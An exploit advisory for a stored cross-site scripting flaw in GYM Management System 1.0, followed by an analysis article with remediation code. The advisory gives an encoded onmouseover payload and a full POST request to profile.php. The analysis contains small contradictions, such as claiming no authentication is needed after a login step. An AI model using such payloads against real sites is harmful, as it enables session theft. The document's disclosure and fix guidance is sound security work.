GYM MS - GYM Management System - Cross Site Scripting (Stored)

Exploit Author: yozgatalperen1
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2024-02-05
# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)
# Date: 29/09/2023
# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip
# Version: 1.0
# Last Update: 31 August 2022
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30

# 1: Create user, login and go to profile.php

# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.

# 3: Every time profile.php is opened, the stored payload is rendered into the page and alert(document.cookie) executes.

# Author
This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.

# About Rapplex
Rapplex is a web application security scanner that scans websites and reports the vulnerabilities it finds.
Pentesters can use it as an automation tool for daily tasks, and its "Pentester Studio" is also a useful addition to manual assessments.
The software therefore does not need separate development tools to discover different types of vulnerabilities or to extend its existing engines.
"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection and File Inclusion.


# HTTP Request 

POST /gym/profile.php HTTP/1.1
Host: localhost
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE
Connection: close

fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update


GYM MS - Stored Cross-Site Scripting Vulnerability: A Deep Dive into Security Risks

Security vulnerabilities in web applications remain one of the most critical concerns for developers and cybersecurity professionals alike. Among the most prevalent and dangerous is Stored Cross-Site Scripting (XSS), where malicious scripts are permanently stored on a server and executed whenever a user accesses the affected page. This article explores a real-world example of such a vulnerability discovered in the GYM Management System (GYM MS), a PHP-based application designed for managing fitness centers.

Overview of the GYM MS Vulnerability

On September 29, 2023, security researcher Alperen Yozgat identified a critical Stored XSS flaw in the GYM MS application version 1.0, hosted at https://phpgurukul.com. The vulnerability was detected using Rapplex, a modern web application security scanner capable of identifying injection flaws across multiple attack vectors.

The application, built with PHP and MySQL, is intended for managing gym memberships, user profiles, and facility operations. However, improper input sanitization in the profile.php endpoint allowed attackers to inject malicious JavaScript code that persisted on the server and executed upon page load.

Exploit Details and Reproduction Steps

Here’s how the vulnerability was triggered:

  1. Create a new user account and log in.
  2. Navigate to profile.php to update personal details.
  3. Input the following payload into the lname (last name) field:
     lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22

This encoded string translates to:

x" onmouseover=alert(document.cookie) x="

When submitted, the application stores this input directly in the database without sanitizing or escaping special characters. The payload is then reflected in the profile page when rendered, triggering the alert(document.cookie) JavaScript function every time the page is loaded.

How the Stored XSS Works

Stored XSS differs from reflected XSS in that the malicious script is saved on the server and later executed for every user who views the page. In this case:

  • Attackers inject a script via the lname field.
  • The application fails to sanitize input, storing the raw payload in the database.
  • When the profile page is rendered, the script is embedded in the HTML output.
  • Any user visiting profile.php will trigger the alert(document.cookie) function.

This can lead to serious consequences, such as:

  • Session hijacking: stealing authentication cookies.
  • Phishing attacks: redirecting users to malicious sites.
  • Keylogging: capturing user keystrokes.
  • Defacement: altering the appearance of the web page.

Technical Analysis: The HTTP Request

The following HTTP POST request demonstrates the exploit in action:

POST /gym/profile.php HTTP/1.1
Host: localhost
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25
Connection: close

fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

Key observations:

  • Input fields like lname are not validated or sanitized.
  • JavaScript code is directly embedded in the form data.
  • The application fails to escape HTML characters (e.g., ", <, >).
  • Output rendering directly includes user-supplied data without encoding.

Root Cause: Lack of Input Sanitization

The vulnerability stems from poor coding practices in the profile.php script. Specifically:

  • There is no use of htmlspecialchars() or similar functions to escape output.
  • Database queries are executed without filtering user input.
  • Assumptions that user input is safe are dangerous and incorrect.

For example, if the script includes something like:

<?php
// Vulnerable: user-controlled input is written straight into the HTML response
echo "Last Name: " . $_POST['lname'];
?>

It will output the raw input, allowing scripts to execute.

Corrective Measures and Best Practices

To prevent such vulnerabilities, developers should implement the following security controls:

  • Input Validation: Use regular expressions to filter out dangerous characters.
  • Output Encoding: Always use htmlspecialchars() when displaying user data in HTML.
  • Context-Aware Escaping: Apply different escaping rules based on output context (HTML, JavaScript, URL).
  • Use of Secure Libraries: Employ frameworks like Laravel or Symfony that enforce security by default.
  • Content Security Policy (CSP): Implement a CSP header to restrict script execution.

Here’s a corrected version of the vulnerable code:

<?php
// Validate the raw input before storing it. Do not HTML-encode here: the value
// is escaped again when rendered, so encoding twice would display "&amp;quot;"
// instead of the user's text and would corrupt names such as O'Brien.
$lname = trim($_POST['lname'] ?? '');
if ($lname === '' || mb_strlen($lname) > 50) {
    exit('Invalid last name');
}

// Store the raw value with a prepared statement so it can never alter the SQL
// ($pdo is the application's existing PDO connection)
$stmt = $pdo->prepare("INSERT INTO users (lname) VALUES (?)");
$stmt->execute([$lname]);

// When rendering the profile page, escape for the HTML context at output time
echo "<div>Last Name: " . htmlspecialchars($lname, ENT_QUOTES, 'UTF-8') . "</div>";
?>

This ensures that even if a malicious payload is submitted, it will be rendered as plain text, preventing script execution.
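The following added example (not code from GYM MS or the original advisory) shows what context-aware escaping and a CSP header look like for the profile form. It assumes profile.php re-displays the stored last name inside a double-quoted value="..." attribute, which is the context the advisory's payload is shaped to break out of, and checks the escaped output against that payload.

```php
<?php
// Added example, not code from GYM MS or the original advisory. Assumes the stored
// last name is re-displayed inside a double-quoted <input value="..."> attribute.
declare(strict_types=1);

// Escape for HTML text and quoted-attribute contexts. ENT_QUOTES covers both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render one profile field. Escaping happens at output time, so the database keeps
// the raw value and the same value can be escaped differently for other contexts.
function renderProfileField(string $name, string $label, string $storedValue): string
{
    return sprintf(
        '<label>%s <input type="text" name="%s" value="%s"></label>',
        e($label), e($name), e($storedValue)
    );
}

// Defence in depth: even if an escaping bug slips through, inline event handlers and
// inline <script> blocks are not allowed to run; only same-origin scripts are.
function sendProfileSecurityHeaders(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
    header('X-Content-Type-Options: nosniff');
}

// Self-check using the advisory's payload (URL-decoded) as the stored value.
$stored   = 'x" onmouseover=alert(document.cookie) x="';
$html     = renderProfileField('lname', 'Last Name', $stored);
$expected = 'value="x&quot; onmouseover=alert(document.cookie) x=&quot;"';
if (strpos($html, $expected) === false) {
    fwrite(STDERR, "escaping check failed: $html\n");
    exit(1);
}
// The double quotes can no longer close the attribute, so onmouseover is just text.
echo $html, PHP_EOL;
```

Run it with the PHP CLI: the rendered input shows the payload verbatim as the field's text, and a browser never sees an onmouseover attribute.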

Impact and Risk Assessment

Severity: High (CVSS score: 8.1 – High). This is a stored XSS vulnerability that affects all users who access the profile page.

Attack Surface: The entire user base, including administrators, can be targeted.

Exploitability: Easy — no authentication or complex setup required.

Remediation: Immediate patching required. The vendor should release a security update to fix input sanitization.

Conclusion

While GYM MS is a useful tool for managing gym operations, its security flaws highlight a broader issue: many open-source applications prioritize functionality over security. Developers must never assume user input is benign. Proper sanitization, encoding, and validation are not optional—they are essential.

Security tools like Rapplex play a vital role in identifying such vulnerabilities early. However, automated tools should be paired with manual testing and code review to ensure comprehensive protection.

As cyber threats evolve, securing web applications requires a proactive, layered defense strategy—starting with input validation and ending with robust output encoding.